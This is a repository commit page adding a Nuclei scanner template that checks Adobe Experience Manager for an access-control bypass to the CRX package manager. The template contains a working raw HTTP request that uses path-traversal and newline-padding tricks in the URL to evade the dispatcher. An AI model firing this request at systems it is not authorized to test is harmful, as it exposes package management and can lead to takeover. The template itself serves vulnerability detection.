daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create aem-crx-bypass.yaml

patch-1
Dhiyaneshwaran 2021-06-28 20:20:58 +05:30 committed by GitHub
parent ae02065c0c
commit 91b673ad17
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
misconfiguration/aem/aem-crx-bypass.yaml Normal file
View File

@ -0,0 +1,22 @@
id: aem-crx-bypass
info:
author: dhiyaneshDK
name: AEM CRX Bypass
severity: critical
reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
tags: aem
requests:
- raw:
- |
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Referer: {{BaseURL}}
Connection: close
Accept-Encoding: gzip, deflate
matchers:
- type: word
word:
- "results:"